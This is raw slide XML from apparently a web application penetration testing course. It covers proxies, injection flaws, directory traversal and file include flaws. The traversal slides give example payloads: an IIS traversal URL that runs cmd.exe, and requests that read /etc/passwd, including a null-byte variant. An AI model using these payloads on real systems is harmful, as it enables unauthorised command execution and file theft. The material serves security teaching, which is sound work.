              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Fiddler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> OWASP Zed Attack Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Burp Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Exercise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Information Leakage &amp; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Directory Browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Directory Browsing Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Directory Traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Blind SQL Injection</a:t>
            </a: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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Traditional Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114691" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1581150"/>
            <a:ext cx="7772400" cy="4724400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The traditional example leaves the web root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It allows access to files on the system including the ability to execute programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>http://vulnsite/scripts/../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>winnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>/system32/cmd.exe+/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>c+dir</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This example runs cmd.exe and retrieves a directory listing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Starting the URL in the scripts directory is required due to the default restriction that executable code must run from the scripts directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>May use encoding to bypass controls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Patches are available for all the servers that are known to be vulnerable to this attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Recommendations in our report should discuss the patch and ensuring patches are applied</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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Application Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115715" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1661160"/>
            <a:ext cx="8061960" cy="4434840"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Many applications load files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Files such as templates, configs and data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As testers, we need to focus on parameters used to load files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Let's look at an example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Site loads configuration file from parameter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>http://vulnsite/index.php?templ=../include/siteconfig.inc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Application doesn'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>t verify the format and the function to load the file doesn't filter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>http://vulnsite/index.php?templ=/etc/passwd</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r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Testing for Directory Traversal</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>and File Include Flaws</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116739" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472440" y="1798320"/>
            <a:ext cx="8199120" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Examine the application for places that appear to include files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Parameters may be obvious</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>config=../../includes/config.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Or built from parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>config=site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The application then uses </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>../../includes/${config}.php to load the file</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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Obvious Parameters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117763" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="280035" y="1483995"/>
            <a:ext cx="8534400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>If we find obvious parameters we should enter paths based on OS detected during mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>/etc/passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Contains usernames on a UNIX system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>/global.asa	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Application configuration on IIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>\docume~1\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>kjohnson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>\mydocu~1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>User directory on Windows in 8.3 notation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>winnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>\system32\cmd.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Used to execute commands on Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Look at the results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Remember results may be in the source</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r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Building Blocks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118787" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="655320" y="1737360"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>If the application builds the path from parameters use the applications logic to load files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Two options:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Terminate the parameter with a NULL "%00"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>/etc/passwd%00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The C string handling which treats a null as the end of the string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Specify the file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Instead of config enter ../../index.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The .php added by the application limits what we can load, but we can still retrieve source code this way</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le 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Local and Remote File Include</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119811" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>File include flaws can retrieve files locally or remotely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>From the perspective of the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
